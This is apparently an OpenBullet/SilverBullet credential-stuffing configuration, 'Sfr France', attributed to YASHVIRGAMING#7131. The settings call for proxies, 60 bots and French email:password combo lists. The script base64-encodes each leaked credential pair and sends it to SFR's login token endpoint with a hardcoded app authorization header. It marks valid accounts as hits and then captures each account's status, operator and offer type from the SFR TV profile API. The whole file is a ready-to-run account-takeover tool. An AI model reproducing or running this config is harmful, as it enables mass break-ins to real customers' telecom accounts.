[SETTINGS]
{
  "Name": "Sfr France",
  "SuggestedBots": 60,
  "MaxCPM": 0,
  "LastModified": "2022-02-23T14:06:22.7379332+00:00",
  "AdditionalInfo": "FRANCE COMBOS ONLY!",
  "RequiredPlugins": [],
  "Author": "🔥 YASHVIRGAMING#7131 🔥",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "MailPass",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "SFR",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
#us_ps FUNCTION Base64Encode "<USER>:<PASS>" -> VAR "comboEnc" 

#get REQUEST GET "https://www.sfr.fr/cas/services/rest/3.0/createToken.json?duration=86400" 
  
  HEADER "Secret: Basic <comboEnc>" 
  HEADER "Authorization: Basic U0ZSVFZBbmRyb2lkVjE6dmVsbzIwMTk=" 
  HEADER "Host: www.sfr.fr" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 
  HEADER "User-Agent: okhttp/3.12.8" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Bad credentials" 
    KEY "Account locked" 
  KEYCHAIN Success OR 
    KEY "token" 

#tk PARSE "<SOURCE>" JSON "token" EncodeOutput=TRUE -> VAR "Token" 

#get_2 REQUEST GET "https://ws-heimdall.tv.sfr.net/heimdall-core/public/api/v2/userProfiles?token=<Token>" 
  
  HEADER "User-Agent: SFRTV - 7.9.1 - LGE LGM V300K - mobile - Android OS 5.1.1" 
  HEADER "Host: ws-heimdall.tv.sfr.net" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

#status PARSE "<SOURCE>" JSON "status" CreateEmpty=FALSE -> CAP "Status" 

#operator PARSE "<SOURCE>" LR "\"operator\":\"" "\"" CreateEmpty=FALSE -> CAP "Operator" 

#offertype PARSE "<SOURCE>" JSON "offerType" CreateEmpty=FALSE -> CAP "offerType" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "CUSTOM" OR 
    KEY "<SOURCE>" DoesNotContain "\"status\":\"ACTIVATED\"" 

#By FUNCTION Constant "🔥 YASHVIRGAMING#7131 🔥" -> CAP "Config By" 

